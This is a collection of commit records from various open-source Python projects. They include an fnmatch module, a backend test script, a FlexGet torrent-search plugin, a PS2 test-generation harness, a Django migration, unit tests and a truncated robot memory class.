field=models.CharField(choices=[('en', 'English'), ('fr', 'French'), ('de', 'German'), ('es', 'Spanish'), ('sv', 'Swedish'), ('tr', 'Turkish')], default='en', max_length=255, verbose_name='Language'),
),
]
| bsd-2-clause | Python | |
ce21eafe126407229ae81d926fccd311035eb7cc | Add local fnmatch module (from Python 2.6) | pocke/editorconfig-vim,benjifisher/editorconfig-vim,johnfraney/editorconfig-vim,johnfraney/editorconfig-vim,VictorBjelkholm/editorconfig-vim,johnfraney/editorconfig-vim,benjifisher/editorconfig-vim,pocke/editorconfig-vim,dublebuble/editorconfig-gedit,dublebuble/editorconfig-gedit,VictorBjelkholm/editorconfig-vim,pocke/editorconfig-vim,VictorBjelkholm/editorconfig-vim,benjifisher/editorconfig-vim,dublebuble/editorconfig-gedit | fnmatch.py | fnmatch.py | """Filename matching with shell patterns.
fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.
The functions operate by translating the pattern into a regular
expression. They cache the compiled regular expressions for speed.
The function translate(PATTERN) returns a regular expression
corresponding to PATTERN. (It does not compile it.)
Based on code from fnmatch.py file distributed with Python 2.6.
Licensed under PSF License (see PYTHON_LICENSE.txt file).
"""
import re
__all__ = ["filter", "fnmatch","fnmatchcase","translate"]
_cache = {}
def fnmatch(name, pat):
    """Test whether FILENAME matches PATTERN.
    Patterns are Unix shell style:
    *       matches everything
    ?       matches any single character
    [seq]   matches any character in seq
    [!seq]  matches any char not in seq
    An initial period in FILENAME is not special.
    Both FILENAME and PATTERN are first case-normalized
    if the operating system requires it.
    If you don't want this, use fnmatchcase(FILENAME, PATTERN).
    """
    import os
    # Normalize both sides for the local OS, then do a case-sensitive match.
    return fnmatchcase(os.path.normcase(name), os.path.normcase(pat))
def filter(names, pat):
    """Return the subset of the list NAMES that match PAT"""
    # NOTE(review): mirrors Python 2.6's fnmatch.filter and intentionally
    # shadows the builtin filter() within this module.
    import os,posixpath
    result=[]
    pat=os.path.normcase(pat)
    # Compile (and memoize) the translated pattern once for the whole list.
    if not pat in _cache:
        res = translate(pat)
        _cache[pat] = re.compile(res)
    match=_cache[pat].match
    if os.path is posixpath:
        # normcase on posix is NOP. Optimize it away from the loop.
        for name in names:
            if match(name):
                result.append(name)
    else:
        # Case-normalizing platforms: normalize each name before matching
        # against the already-normalized pattern.
        for name in names:
            if match(os.path.normcase(name)):
                result.append(name)
    return result
def fnmatchcase(name, pat):
    """Test whether FILENAME matches PATTERN, including case.
    This is a version of fnmatch() which doesn't case-normalize
    its arguments.
    """
    # Memoize the compiled regex per pattern in the module-level cache.
    regex = _cache.get(pat)
    if regex is None:
        regex = re.compile(translate(pat))
        _cache[pat] = regex
    return regex.match(name) is not None
def translate(pat):
    """Translate a shell PATTERN to a regular expression.
    There is no way to quote meta-characters.
    """
    pieces = []
    pos, length = 0, len(pat)
    while pos < length:
        ch = pat[pos]
        pos += 1
        if ch == '*':
            pieces.append('.*')
        elif ch == '?':
            pieces.append('.')
        elif ch == '[':
            # Scan for the closing bracket; a leading '!' and a ']' that
            # appears first inside the set are part of the set itself.
            end = pos
            if end < length and pat[end] == '!':
                end = end + 1
            if end < length and pat[end] == ']':
                end = end + 1
            while end < length and pat[end] != ']':
                end = end + 1
            if end >= length:
                # Unterminated set: treat the '[' as a literal.
                pieces.append('\\[')
            else:
                inner = pat[pos:end].replace('\\', '\\\\')
                pos = end + 1
                if inner[0] == '!':
                    inner = '^' + inner[1:]
                elif inner[0] == '^':
                    inner = '\\' + inner
                pieces.append('[%s]' % inner)
        else:
            pieces.append(re.escape(ch))
    return ''.join(pieces) + '\Z(?ms)'
| bsd-2-clause | Python | |
13a45b0b1ab811d6e0ba131380961fba59e8963c | Create w3_1.py | s40523215/2016fallcp_hw,s40523215/2016fallcp_hw,s40523215/2016fallcp_hw | w3_1.py | w3_1.py | print("test")
| agpl-3.0 | Python | |
5b456b6cdbd76b1e51548775ec0118a28db98ef2 | add test-backend script | skotep/webdev,skotep/webdev | sample/RiceBookServer/test-backend.py | sample/RiceBookServer/test-backend.py | #!/usr/bin/env python
import requests, json, sys, pprint
pp = pprint.PrettyPrinter(indent=4)
class cc:
    # ANSI terminal escape sequences used to colorize test output.
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset back to the default style
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def get(endpoint):
    """GET <backend>/<endpoint>; exit(1) on a non-200 reply, else return decoded JSON."""
    url = config["backend"] + endpoint
    r = requests.get(url)
    if r.status_code != 200:
        print(cc.FAIL + ("ERROR: For GET %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
        sys.exit(1)
    return json.loads(r.text)
def put(endpoint):
    """PUT <backend>/<endpoint> with no body; exit(1) on a non-200 reply, else return decoded JSON."""
    url = config["backend"] + endpoint
    r = requests.put(url)
    if r.status_code != 200:
        print(cc.FAIL + ("ERROR: For PUT %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
        sys.exit(1)
    return json.loads(r.text)
def getPosts(postId=None):
    """Fetch /posts (or /posts/<postId> when given) and return the validated posts list."""
    endpoint = '/posts'
    if postId is not None:
        endpoint = (endpoint + "/%d") % postId
    return checkPosts(get(endpoint))
def checkPosts(result):
    """Extract the "posts" list from a decoded response; report and return [] when absent."""
    if "posts" in result:
        return result["posts"]
    print(cc.FAIL + "ERROR: GET /posts did not have \"posts\" entry" + cc.ENDC)
    print(result)
    return []
def addPost(body):
    """POST a new post with the given body text and return the validated posts list."""
    r = requests.post(config["backend"] + "/post", json={'body':body})
    return checkPosts( json.loads(r.text) )
def msg(message):
    """Print a progress message in blue."""
    print(cc.BLUE + message + cc.ENDC)
################################################
if len(sys.argv) < 2:
print("usage: %s README.json" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], 'r') as f:
config = json.loads(f.read())
for key in config.keys():
if config[key].endswith('/'):
config[key] = (config[key])[:-1]
print(cc.YELLOW + ("Checking for %s site %s" % (config['netid'], config['backend'])) + cc.ENDC)
######################################
# inital GET
r = get("/")
msg("GET /")
pp.pprint(r)
# GET /posts
posts = getPosts()
msg("GET /posts")
pp.pprint(posts)
if len(posts) < 3:
print(cc.FAIL + ("FAIL: Expected at least 3 posts from GET /posts but found %d " % len(posts)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts returned %d posts, expecting at least 3" % len(posts)) + cc.ENDC)
######################################
# add a new post
body = "Hello World!"
newPosts = addPost(body)
msg("POST /post -d " + body)
pp.pprint(newPosts)
if len(newPosts) is not 1:
print(cc.FAIL + ("FAIL: Expected 1 new post added but found %d posts" % len(newPosts)) + cc.ENDC)
else:
newPostId = newPosts[0]['id']
print(cc.GREEN + ("OK: POST /post returned one new post with id=%d" % newPostId) + cc.ENDC)
if newPosts[0]['body'] != body:
print(cc.FAIL + ("FAIL: Post did not have the correct body message: %s vs %s" % (newPosts[0]['body'], body)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: post body was correct") + cc.ENDC)
######################################
# get that new post by itself
getNewPost = getPosts(newPostId)
msg("GET /posts/%d" % newPostId)
pp.pprint(getNewPost)
if len(getNewPost) is not 1:
print(cc.FAIL + ("FAIL: Expected to get the one post that was added but found %d posts" % len(getNewPost)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts/%d got the new post" % newPostId) + cc.ENDC)
if getNewPost[0]['body'] != newPosts[0]['body'] or newPosts[0]['body'] != body:
print(cc.FAIL + ("FAIL: Post did not have the correct body message: %s" % getNewPost[0]['body']) + cc.ENDC)
else:
print(cc.GREEN + ("OK: post body was correct") + cc.ENDC)
######################################
# confirm that we only added one post
posts2 = getPosts()
msg("GET /posts")
pp.pprint(posts2)
if len(posts2) is not len(posts) + 1:
print(cc.FAIL + ("FAIL: Expected one new post added but found %d + 1 = %d" % (len(posts), len(posts2))) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts returned one additional post") + cc.ENDC)
######################################
print(cc.YELLOW + ('Testing stubs...') + cc.ENDC)
# Stubs
for e in [ "/status", "/statuses", "/statuses/"+config['netid'], "/email", "/email/"+config['netid'], "/zipcode", "/zipcode/"+config['netid'], "/pictures", "/pictures/" + config['netid'] ]:
msg("GET " + e)
pp.pprint(get(e))
for e in [ "/status", "/email", "/zipcode", "/pictures" ]:
msg("PUT " + e)
pp.pprint(put(e))
## done
print(cc.YELLOW + ('COMPLETE!') + cc.ENDC)
| apache-2.0 | Python | |
ce344f340682f81837ae5b71e7c9e17e276c953d | Create nxn.py | omergulen/brainhack17,omergulen/brainhack17,omergulen/brainhack17 | nxn/nxn.py | nxn/nxn.py | N = int(input())
# Read the N rows of an N x N integer matrix (N was read above), then print
# the absolute difference between the two diagonal sums.
liste = []
for i in range(0,N):
    liste.append(list(map(int, input().split(" "))))
prisum = 0  # primary diagonal (top-left to bottom-right)
secsum = 0  # secondary diagonal (bottom-left to top-right)
for i in range(0,N):
    prisum += liste[i][i]
j = 0
for i in range(N-1,-1,-1):
    secsum += liste[i][j]
    j += 1
print(abs(prisum-secsum))
| mit | Python | |
257bc9e6538d8320603b29465a02000646833805 | Add a script to choose randomly from a list. I needed it to choose a random desktop background. | Byvire/python_scripts,Byvire/python_scripts | choose_random.py | choose_random.py | #!/usr/bin/env python3
import random
import sys
if __name__ == "__main__":
    # Each stdin line (newline included) is one candidate option.
    options = list(sys.stdin)  # list of lines of text
    # end='' because the chosen line already carries its own newline.
    # NOTE(review): raises IndexError when stdin is empty.
    print(random.choice(options), end='')
| mit | Python | |
271999dae2cd7f736b66c68f5e2454aac995a10d | Call `process()` from Python | juliangrosshauser/embed,juliangrosshauser/embed,juliangrosshauser/embed,juliangrosshauser/embed | embed.py | embed.py | from ctypes import cdll
lib = cdll.LoadLibrary("target/release/libembed.dylib")  # macOS dylib; presumably built by `cargo build --release` -- TODO confirm
lib.process()  # invoke the library's exported `process` symbol via the C ABI
| mit | Python | |
8ba799bccb479c757070104649d60819e627b507 | Add a search plugin for PtN | Danfocus/Flexget,dsemi/Flexget,v17al/Flexget,X-dark/Flexget,OmgOhnoes/Flexget,Flexget/Flexget,crawln45/Flexget,ZefQ/Flexget,ZefQ/Flexget,tobinjt/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,sean797/Flexget,jawilson/Flexget,patsissons/Flexget,malkavi/Flexget,drwyrm/Flexget,X-dark/Flexget,cvium/Flexget,Pretagonist/Flexget,offbyone/Flexget,tarzasai/Flexget,v17al/Flexget,Flexget/Flexget,OmgOhnoes/Flexget,dsemi/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,oxc/Flexget,tvcsantos/Flexget,LynxyssCZ/Flexget,jacobmetrick/Flexget,ianstalk/Flexget,crawln45/Flexget,oxc/Flexget,thalamus/Flexget,voriux/Flexget,X-dark/Flexget,camon/Flexget,tsnoam/Flexget,xfouloux/Flexget,ibrahimkarahan/Flexget,OmgOhnoes/Flexget,jawilson/Flexget,drwyrm/Flexget,Flexget/Flexget,voriux/Flexget,antivirtel/Flexget,ibrahimkarahan/Flexget,jawilson/Flexget,qvazzler/Flexget,crawln45/Flexget,grrr2/Flexget,antivirtel/Flexget,malkavi/Flexget,drwyrm/Flexget,spencerjanssen/Flexget,cvium/Flexget,vfrc2/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,qk4l/Flexget,dsemi/Flexget,thalamus/Flexget,spencerjanssen/Flexget,gazpachoking/Flexget,tsnoam/Flexget,v17al/Flexget,thalamus/Flexget,tsnoam/Flexget,Flexget/Flexget,grrr2/Flexget,jacobmetrick/Flexget,poulpito/Flexget,oxc/Flexget,tvcsantos/Flexget,crawln45/Flexget,ianstalk/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,ianstalk/Flexget,tarzasai/Flexget,cvium/Flexget,Danfocus/Flexget,Pretagonist/Flexget,ratoaq2/Flexget,lildadou/Flexget,ZefQ/Flexget,vfrc2/Flexget,xfouloux/Flexget,offbyone/Flexget,poulpito/Flexget,Danfocus/Flexget,gazpachoking/Flexget,sean797/Flexget,poulpito/Flexget,ratoaq2/Flexget,patsissons/Flexget,Danfocus/Flexget,patsissons/Flexget,lildadou/Flexget,xfouloux/Flexget,tobinjt/Flexget,sean797/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,spencerjanssen/Flexget,qk4l/Flexget,tobinjt/Flexget,ibrahimkarahan/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,lildadou/Flexget,tarzasai/Flexget,tobinjt/Flex
get,malkavi/Flexget,qvazzler/Flexget,Pretagonist/Flexget,jawilson/Flexget,camon/Flexget,vfrc2/Flexget,grrr2/Flexget,LynxyssCZ/Flexget,antivirtel/Flexget | flexget/plugins/search_ptn.py | flexget/plugins/search_ptn.py | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils import requests
from flexget.utils.imdb import extract_id
from flexget.utils.soup import get_soup
from flexget.utils.search import torrent_availability
session = requests.Session()
log = logging.getLogger('search_ptn')
class SearchPTN(object):
    """Search plugin for PirateTheNet: cookie-authenticated HTML scraping."""
    # Plugin config schema: the three PtN session cookie values.
    schema = {
        'type': 'object',
        'properties': {
            'hashv': {'type': 'string'},
            'pass': {'type': 'string'},
            'uid': {'type': 'number'}
        },
        'required': ['hashv', 'pass', 'uid'],
        'additionalProperties': False
    }
    def search(self, entry, config):
        """Scrape PtN's browse page for `entry` and return a set of result Entries.

        Raises plugin.PluginError when the configured cookies are rejected.
        """
        cookies = {
            'ptn_hashv': config['hashv'],
            'ptn_pass': config['pass'],
            'ptn_uid': str(config['uid'])
        }
        # Default to searching by title (0=title 3=imdb_id)
        search_by = 0
        if 'imdb_id' in entry:
            searches = [entry['imdb_id']]
            search_by = 3
        elif 'movie_name' in entry:
            search = entry['movie_name']
            if 'movie_year' in entry:
                search += ' %s' % entry['movie_year']
            searches = [search]
        else:
            searches = entry.get('search_strings', [entry['title']])
        results = set()
        for search in searches:
            try:
                r = requests.get('http://piratethenet.org/browse.php',
                                 params={'search': search, '_by': search_by}, cookies=cookies)
            except requests.RequestException as e:
                log.error('Error searching ptn: %s' % e)
                continue
            soup = get_soup(r.text)
            # Getting the login page back means the cookies are stale/invalid.
            if 'login' in soup.head.title.text.lower():
                log.error('PtN cookie info invalid')
                raise plugin.PluginError('PTN cookie info invalid')
            try:
                # The second 'main' table on the page holds the result rows.
                results_table = soup.find_all('table', attrs={'class': 'main'}, limit=2)[1]
            except IndexError:
                log.debug('no results found for `%s`' % search)
                continue
            # Skip the header row; each remaining <tr> is one torrent.
            for row in results_table.find_all('tr')[1:]:
                columns = row.find_all('td')
                # NOTE(review): rebinding `entry` shadows the search seed
                # parameter for the rest of this method.
                entry = Entry()
                links = columns[1].find_all('a', recursive=False, limit=2)
                entry['title'] = links[0].text
                if len(links) > 1:
                    entry['imdb_id'] = extract_id(links[1].get('href'))
                entry['url'] = columns[2].a.get('href')
                entry['torrent_seeds'] = int(columns[8].text)
                entry['torrent_leeches'] = int(columns[9].text)
                entry['search_sort'] = torrent_availability(entry['torrent_seeds'], entry['torrent_leeches'])
                # Size cell renders as "<number><br><unit>"; normalize to MB.
                size = columns[6].find('br').previous_sibling
                unit = columns[6].find('br').next_sibling
                if unit == 'GB':
                    entry['content_size'] = int(float(size) * 1024)
                elif unit == 'MB':
                    entry['content_size'] = int(float(size))
                elif unit == 'KB':
                    entry['content_size'] = int(float(size) / 1024)
                results.add(entry)
        return results
@event('plugin.register')
def register_plugin():
    # Register as a search-group plugin named 'ptn' (plugin API v2).
    plugin.register(SearchPTN, 'ptn', groups=['search'], api_ver=2)
| mit | Python | |
9416747193dfd597bf15d855d4673cb5b16ce76e | Add python methods to handle api end-points | EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list | api/api.py | api/api.py | from connexion.resolver import RestyResolver
from flask import current_app, request, abort, jsonify, g, url_for
from flask_httpauth import HTTPAuth
__all__ = ["login", "register", "add_bucket_list", "get_bucket_lists",
"get_bucket_list","put_bucket_list","delete_bucket_list",
"create_item_in_bucket_list", "get_items_in_bucket_list",
"update_bucket_list_item", "delete_bucket_list_item"]
def login():
    """Authenticate a user and issue a token. TODO: implement."""
    pass
def register():
    """Create a new user account. TODO: implement."""
    pass
def add_bucket_list():
    """Create a new bucket list for the current user. TODO: implement."""
    pass
def get_bucket_lists():
    """Return all bucket lists of the current user. TODO: implement."""
    pass
def get_bucket_list():
    """Return a single bucket list by id. TODO: implement."""
    pass
def put_bucket_list():
    """Update a bucket list by id. TODO: implement."""
    pass
def delete_bucket_list():
    """Delete a bucket list by id. TODO: implement."""
    pass
def create_item_in_bucket_list():
    """Add an item to a bucket list. TODO: implement."""
    pass
def get_items_in_bucket_list():
    """Return the items of a bucket list. TODO: implement."""
    pass
def update_bucket_list_item():
    """Update a single bucket list item. TODO: implement."""
    pass
def delete_bucket_list_item():
    """Delete a single bucket list item. TODO: implement."""
    pass
from api.models import User, BucketList, Item
| mit | Python | |
23d313aff58a34f44fc5addeffd015ac36b1c1be | Add a script that makes generating tests easier. | jpd002/ps2autotests,unknownbrackets/ps2autotests,jpd002/ps2autotests,jpd002/ps2autotests,unknownbrackets/ps2autotests,unknownbrackets/ps2autotests | gentest.py | gentest.py | import os
import re
import subprocess
import sys
import threading
# Note that PS2HOSTNAME is expected to be set in env.
PS2CLIENT = "ps2client"
MAKE = "make"
TEST_ROOT = "tests/"
TIMEOUT = 10
RECONNECT_TIMEOUT = 10
tests_to_generate = [
"cpu/ee/alu",
"cpu/ee/branch",
"cpu/ee/branchdelay",
]
class Command(object):
    """Runs an external command on a worker thread, capturing stdout until the
    test harness prints its "-- TEST END" sentinel (or EOF)."""
    def __init__(self, cmd):
        self.cmd = cmd          # argv list handed to subprocess.Popen
        self.process = None     # Popen handle once started
        self.output = None      # captured stdout (when capture=True)
        self.timeout = False    # set by stop() when the deadline expired
        self.thread = None      # reader/watchdog thread
    def start(self, capture=True):
        """Launch the process; with capture, read stdout line by line until
        EOF or the end-of-test sentinel, then terminate the child."""
        def target():
            self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            if capture:
                self.process.stdin.close()
                self.output = ""
                while True:
                    line = self.process.stdout.readline()
                    self.output += str(line)
                    # Stop at EOF ("") or at the sentinel with any line ending.
                    if line == "" or line == "-- TEST END" or line == "-- TEST END\r\n" or line == "-- TEST END\n":
                        break
            self.finish()
        self.thread = threading.Thread(target=target)
        self.thread.start()
    def stop(self):
        """Abort a still-running command, marking it as timed out."""
        if self.thread.is_alive():
            self.timeout = True
            self.finish()
        self.thread.join()
    def finish(self):
        """Terminate the child, ignoring races where it already exited.
        NOTE(review): catching WindowsError only is platform-specific."""
        try:
            self.process.terminate()
        except WindowsError:
            pass
    def run(self, timeout):
        """Start with capture and wait up to `timeout` seconds for completion."""
        self.start()
        self.thread.join(timeout)
def prepare_test(test, args):
    """Build the test's ELF with make (honoring -r/--rebuild) unless -k/--keep is given."""
    if not ("-k" in args or "--keep" in args):
        olddir = os.getcwd()
        os.chdir(TEST_ROOT + os.path.dirname(test))
        make_target = "all"
        if "-r" in args or "--rebuild" in args:
            make_target = "rebuild"
        make_result = os.system("%s MAKE=\"%s\" %s" % (MAKE, MAKE, make_target))
        os.chdir(olddir)
        # Don't run the test if make failed, let them fix it.
        if make_result > 0:
            sys.exit(make_result)
def gen_test(test, args):
    """Run one test ELF on the PS2 via ps2client and return its trimmed output.

    Returns the text from "-- TEST BEGIN" through "-- TEST END" with
    normalized line endings, or False when the ELF is missing or the run
    never printed the end sentinel.
    """
    elf_path = TEST_ROOT + test + ".elf"
    if not os.path.exists(elf_path):
        print("You must compile the test into a ELF first (" + elf_path + ")")
        return False

    # Seems like the PS2 can hang if it's not reset, let's just always reset for now.
    c = Command([PS2CLIENT, "reset"])
    c.run(RECONNECT_TIMEOUT)

    # Okay, time to run the command.
    c = Command([PS2CLIENT, "execee", "host:" + elf_path + " " + " ".join(args)])
    c.run(TIMEOUT)

    output = c.output
    if not re.search(r"^-- TEST END\s*$", output, re.MULTILINE):
        print(output)
    else:
        # Strip out debug output from ps2link, etc.
        # Bug fix: re.sub()'s 4th positional argument is `count`, not `flags`,
        # so the original calls passed re.MULTILINE (8) as a substitution
        # limit (notably capping the \r\n normalization at 8 replacements).
        # [\s\S] replaces [^\Z], whose \Z escape is invalid inside a
        # character class on modern Python.
        output = re.sub(r"\A[\s\S]+?-- TEST BEGIN", "-- TEST BEGIN", output)
        output = re.sub(r"\n-- TEST END\s*\n[\s\S]+\Z", "\n-- TEST END\n", output)
        output = output.replace("\r\n", "\n")
        return output
    return False
def gen_test_expected(test, args):
    """Build and run `test` on the PS2, writing its output to <test>.expected."""
    print("Running test " + test + " on the PS2...")
    prepare_test(test, args)
    result = gen_test(test, args)
    expected_path = TEST_ROOT + test + ".expected"
    if result != False:
        # Normalize line endings on windows to avoid spurious git warnings.
        open(expected_path, "wt").write(result)
        print("Expected file written: " + expected_path)
        return True
    return False
def main():
    """Parse CLI flags/test names and regenerate the .expected file for each test."""
    tests = []
    args = []
    # Dash-prefixed words are option flags; everything else names a test.
    for arg in sys.argv[1:]:
        if arg[0] == "-":
            args.append(arg)
        else:
            tests.append(arg.replace("\\", "/"))
    if not tests:
        tests = tests_to_generate
    if "-h" in args or "--help" in args:
        print("Usage: %s [options] cpu/ee/alu cpu/ee/branch...\n" % (os.path.basename(sys.argv[0])))
        print("Tests should be found under %s and omit the .elf extension." % (TEST_ROOT))
        print("Automatically runs make in the test by default.\n")
        print("Options:")
        print(" -r, --rebuild run make rebuild for each test")
        print(" -k, --keep do not run make before tests")
        return
    for test in tests:
        gen_test_expected(test, args)
main()
| isc | Python | |
b0dfbb63a306255bc08eae2e7dd9360ca56a366f | Add default value of access requests enabled to exsisting projects made before model added | aaxelb/osf.io,caseyrollins/osf.io,cslzchen/osf.io,sloria/osf.io,caseyrollins/osf.io,mfraezz/osf.io,mfraezz/osf.io,cslzchen/osf.io,icereval/osf.io,adlius/osf.io,mattclark/osf.io,erinspace/osf.io,felliott/osf.io,cslzchen/osf.io,brianjgeiger/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,baylee-d/osf.io,Johnetordoff/osf.io,cslzchen/osf.io,aaxelb/osf.io,mfraezz/osf.io,CenterForOpenScience/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,mattclark/osf.io,adlius/osf.io,sloria/osf.io,adlius/osf.io,caseyrollins/osf.io,HalcyonChimera/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,felliott/osf.io,baylee-d/osf.io,aaxelb/osf.io,sloria/osf.io,adlius/osf.io,pattisdr/osf.io,mattclark/osf.io,brianjgeiger/osf.io,erinspace/osf.io,erinspace/osf.io,mfraezz/osf.io,HalcyonChimera/osf.io,HalcyonChimera/osf.io,felliott/osf.io,felliott/osf.io,brianjgeiger/osf.io,baylee-d/osf.io,icereval/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,icereval/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io | osf/migrations/0100_set_access_request_enabled.py | osf/migrations/0100_set_access_request_enabled.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-30 18:34
from __future__ import unicode_literals
from django.db import migrations, models ,connection
from osf.models import AbstractNode
class Migration(migrations.Migration):
    """Backfill ``access_requests_enabled=True`` on nodes created before the
    NodeRequest feature (osf migration 0077) and tighten the permissions field."""
    dependencies = [
        ('osf', '0099_merge_20180427_1109'),
    ]
    # NOTE(review): these are referenced unbound by RunPython below, so Django
    # calls them as func(apps, schema_editor) -- `self` receives the app
    # registry and *args/**kwargs soak up the rest.
    def add_default_access_requests_enabled(self, *args, **kwargs):
        # Get the date the original noderequest migration was applied
        sql = "SELECT applied from django_migrations WHERE app = 'osf' AND name = '0077_add_noderequest_model';"
        with connection.cursor() as cursor:
            cursor.execute(sql)
            date_noderequest_migration = cursor.fetchall()[0][0]
        # Get all projects created before that
        AbstractNode.objects.filter(created__lte=date_noderequest_migration).update(access_requests_enabled=True)
    def remove_default_access_requests_enabled(self, *args, **kwargs):
        # Get the date the original noderequest migration was applied
        sql = "SELECT applied from django_migrations WHERE app = 'osf' AND name = '0077_add_noderequest_model';"
        with connection.cursor() as cursor:
            cursor.execute(sql)
            date_noderequest_migration = cursor.fetchall()[0][0]
        # Get all projects created before that; None reverses the backfill.
        AbstractNode.objects.filter(created__lte=date_noderequest_migration).update(access_requests_enabled=None)
    operations = [
        migrations.AlterField(
            model_name='noderequestaction',
            name='permissions',
            field=models.CharField(choices=[(b'read', b'Read'), (b'write', b'Write'), (b'admin', b'Admin')], default=b'read', max_length=5),
        ),
        migrations.RunPython(add_default_access_requests_enabled, remove_default_access_requests_enabled),
    ]
| apache-2.0 | Python | |
1c511dcc4156d68f84b97067433ca151f549df1b | Add test for protocol. | lndbrg/flowirc | flowirc/tests/test_IRCClientProtocol.py | flowirc/tests/test_IRCClientProtocol.py | from unittest import TestCase
from unittest.mock import Mock, patch, call, MagicMock
from flowirc.client import IRCClientProtocol
__author__ = 'olle.lundberg'
class TestIRCClientProtocol(TestCase):
def setUp(self):
self.proto = IRCClientProtocol()
self.transport = Mock()
def tearDown(self):
self.proto = None
self.transport = None
def test_connection_made(self):
self.proto.after_connection_made = Mock()
self.proto.connection_made(self.transport)
self.assertEqual(self.proto._transport, self.transport)
self.assertEqual(1, self.proto.after_connection_made.call_count)
self.assertEqual((), self.proto.after_connection_made.call_args)
def test_send(self):
self.proto._transport = Mock()
self.proto.send('foo')
self.proto._transport.write.assert_called_once_with(b'foo')
self.proto._transport.reset_mock()
calls = [call(b'foo'), call(b'bar'), call(b'baz')]
self.proto.send('foo', 'bar', 'baz')
self.assertEqual(3, self.proto._transport.write.call_count)
self.proto._transport.write.assert_has_calls(calls)
self.proto._transport.reset_mock()
data = Mock()
data.encode = Mock(side_effect=AttributeError(
"'NoneType' object has no attribute 'encode'"))
self.assertRaises(AttributeError, self.proto.send, data)
@patch('asyncio.Task')
@patch('flowirc.client.MessageBase')
def test_data_received(self, messagebase, task):
self.proto.message_received = Mock()
self.proto.data_received(b'')
self.proto.data_received(b'f')
self.assertEqual(0, task.call_count)
self.proto.data_received(b'foo')
self.assertEqual(1, messagebase.from_str.call_count)
task.called_once_with(self.proto.message_received)
self.assertEqual(1, self.proto.message_received.call_count)
messagebase.reset_mock()
task.reset_mock()
self.proto.message_received.reset_mock()
ping = "PING irc.example.net\r\n"
mock = MagicMock(return_value=ping)
messagebase.from_str = mock
self.proto.data_received(b' \r\nPING :irc.example.net\r\n')
self.assertEqual(1, messagebase.from_str.call_count)
self.proto.message_received.called_once_with(ping)
messagebase.reset_mock()
task.reset_mock()
self.proto.message_received.reset_mock()
mock = MagicMock(return_value=None)
messagebase.from_str = mock
self.proto.data_received(b' \r\nNOT_A_CMD :irc.example.net\r\n')
self.assertEqual(1, messagebase.from_str.call_count)
self.assertEqual(0, self.proto.message_received.call_count)
| mit | Python | |
2af3b158f1bc4f528f3d4aa7efb8cd595caca0a5 | Add dump/html add-on #69 (dump/html) | tadashi-aikawa/gemini | jumeaux/addons/dump/html.py | jumeaux/addons/dump/html.py | # -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
from owlmixin import OwlMixin, TList
from jumeaux.addons.dump import DumpExecutor
from jumeaux.logger import Logger
from jumeaux.models import DumpAddOnPayload
logger: Logger = Logger(__name__)
LOG_PREFIX = "[dump/html]"
class Config(OwlMixin):
    # Add-on configuration (validated/parsed by owlmixin).
    default_encoding: str = 'utf8'  # used when the payload carries no encoding
    force: bool = False             # prettify regardless of MIME type
    mime_types: TList[str] = [
        'text/html'
    ]
def pretty(html: str) -> str:
    # Re-indent the document's <html> subtree via BeautifulSoup's lxml parser.
    return BeautifulSoup(html, "lxml").html.prettify()
class Executor(DumpExecutor):
    """Dump add-on that prettifies HTML response bodies before they are written."""
    def __init__(self, config: dict):
        self.config: Config = Config.from_dict(config or {})
    def exec(self, payload: DumpAddOnPayload) -> DumpAddOnPayload:
        mime_type: str = payload.response.mime_type.get()
        encoding: str = payload.encoding.get_or(self.config.default_encoding)
        # Prettify when forced by config or when the MIME type matches;
        # otherwise pass the body through untouched.
        if self.config.force:
            logger.debug(f"{LOG_PREFIX} Forced to html -- mime_type: {mime_type} -- encoding: {encoding}")
            body = pretty(payload.body.decode(encoding, errors='replace')).encode(encoding, errors='replace')
        elif mime_type in self.config.mime_types:
            logger.debug(f"{LOG_PREFIX} Parse as html -- mime_type: {mime_type} -- encoding: {encoding}")
            body = pretty(payload.body.decode(encoding, errors='replace')).encode(encoding, errors='replace')
        else:
            logger.debug(f"{LOG_PREFIX} Don't Parse as html -- mime_type: {mime_type} -- encoding: {encoding}")
            body = payload.body
        return DumpAddOnPayload.from_dict({
            "response": payload.response,
            "body": body,
            "encoding": encoding
        })
| mit | Python | |
575fd05ace28ed392591228bfdb01f6e739eeff4 | Create RobotMemory.py | liammcinroy/RobotMemory | RobotMemory.py | RobotMemory.py | #-------------------------------------------------------------------------------
# Name: Robot Memory
# Purpose: Stores memory about where robot has been
#
# Author: Liam McInory
#
# Created: 06/03/2014
# Copyright: (c) Liam 2014
# Licence: GNU
#-------------------------------------------------------------------------------
from Myro import *
from math import *
class RobotMemory:
    """Tracks where a Myro robot has driven on a coarse occupancy grid.

    Bug fixes vs. the original: every method was missing ``self`` (so the
    constructor arguments were mis-bound and every "assignment" landed in a
